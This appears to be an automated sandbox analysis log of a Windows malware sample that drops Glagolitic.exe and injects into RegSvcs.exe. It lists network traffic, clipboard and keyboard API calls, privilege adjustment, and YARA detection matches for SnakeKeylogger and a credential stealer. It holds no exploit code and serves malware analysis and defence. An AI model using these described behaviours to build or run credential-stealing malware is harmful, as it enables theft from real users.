              Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,0_2_0047C81C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,2_2_0047C81C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C81C

              System Summary

              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004710F1 NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0045034C GetParent,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044036A NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00440306 NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0047132F NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00440338 NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044048E NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044786A NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0047EA6F NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00447ABC SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00447B4E NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00454CFC NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00454D4A NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0042FDA6 ClientToScreen,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0042FE05 NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004710F1 NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0045034C GetParent,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044036A NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00440306 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0047132F NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00440338 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044048E NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044786A NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0047EA6F NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00447ABC SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00447B4E NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00454CFC NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00454D4A NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0042FDA6 ClientToScreen,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0042FE05 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00401100 NtdllDefWindowProc_W,KillTimer,PostQuitMessage,SetTimer,RegisterClipboardFormatW,CreatePopupMenu
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004710F1 NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0045034C GetParent,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044036A NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00440306 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0047132F NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00440338 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044048E NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044786A NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0047EA6F NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00447ABC SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00447B4E NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00454CFC NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00454D4A NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0042FDA6 ClientToScreen,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0042FE05 GetWindowLongW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,754C5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004096A0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0042200C
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00404170
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0041A217
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00412216
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0042435D
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004033C0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044F430
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004125E8
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044663B
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00413801
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0042096F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004129D0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004119E3
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0041C9AE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0047EA6F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0040FA10
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044EB5F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00423C81
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00411E78
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00442E0C
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00420EC0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044CF17
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00444FD2
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_03F19230
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004096A0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0042200C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00404170
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0041A217
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00412216
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0042435D
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004033C0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044F430
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004125E8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044663B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00413801
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0042096F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004129D0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004119E3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0041C9AE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0047EA6F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0040FA10
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044EB5F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00423C81
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00411E78
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00442E0C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00420EC0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044CF17
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00444FD2
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_03F64E00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_03115370
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311D278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_03117118
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311C146
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311A088
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311C738
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311C468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311CA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_03113AA1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311E988
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_031169A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311CFAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311CCD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311F631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311FA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0311E97B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_031129EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_031139EF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_03113E09
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004096A0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0042200C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00404170
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0041A217
